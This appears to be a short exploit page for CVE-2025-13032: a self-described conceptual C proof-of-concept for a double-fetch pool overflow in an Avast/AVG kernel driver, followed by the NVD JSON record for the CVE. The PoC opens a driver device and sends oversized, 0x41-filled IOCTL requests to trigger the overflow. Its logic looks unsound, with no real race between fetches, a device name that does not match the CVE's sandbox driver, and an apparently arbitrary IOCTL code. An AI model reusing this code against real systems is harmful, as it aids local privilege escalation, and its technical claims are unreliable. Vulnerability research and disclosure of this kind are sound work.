CVE-2025-13032

#include <windows.h> #include <stdio.h> // CVE-2025-13032 PoC - Avast/AVG Double Fetch Privilege Escalation // This is a conceptual PoC demonstrating the attack vector // Malicious driver communication structure typedef struct _AV_DRIVER_REQUEST { ULONG_PTR buffer1; // First fetch location ULONG_PTR buffer2; // Second fetch location (will be modified) ULONG size; ULONG operation; } AV_DRIVER_REQUEST, *PAV_DRIVER_REQUEST; // Trigger the double fetch vulnerability BOOL TriggerDoubleFetch(HANDLE hDevice) { AV_DRIVER_REQUEST req = {0}; PVOID userBuffer = VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_READWRITE); if (!userBuffer) return FALSE; // Setup malicious buffer req.buffer1 = (ULONG_PTR)userBuffer; req.buffer2 = (ULONG_PTR)userBuffer; req.size = 0x100; req.operation = 0x1337; // First read will get valid data DeviceIoControl(hDevice, 0x80002000, &req, sizeof(req), NULL, 0, NULL, NULL); // Modify buffer between fetches to trigger race condition Sleep(1); // Timing window for race condition // Trigger pool overflow with modified buffer memset(userBuffer, 0x41, 0x200); // Overflow data req.size = 0x200; // Larger size for overflow // Second read will use modified data causing overflow DeviceIoControl(hDevice, 0x80002000, &req, sizeof(req), NULL, 0, NULL, NULL); VirtualFree(userBuffer, 0, MEM_RELEASE); return TRUE; } int main() { HANDLE hDevice = CreateFile("\\\\.\\AswVpnDriver", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open device\\n"); return 1; } printf("[*] Triggering CVE-2025-13032 Double Fetch...\\n"); TriggerDoubleFetch(hDevice); CloseHandle(hDevice); return 0; }

{"cve": {"id": "CVE-2025-13032", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:39.700", "lastModified": "2025-12-08T18:10:03.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Double fetch in sandbox kernel driver in Avast/AVG Antivirus <25.3  on windows allows local attacker to escalate privelages via pool overflow."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:avast:antivirus:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.3", "matchCriteriaId": "E711903A-5520-4157-BD8D-B059395910B4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.gendigital.com/us/en/contact-us/security-advisories/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}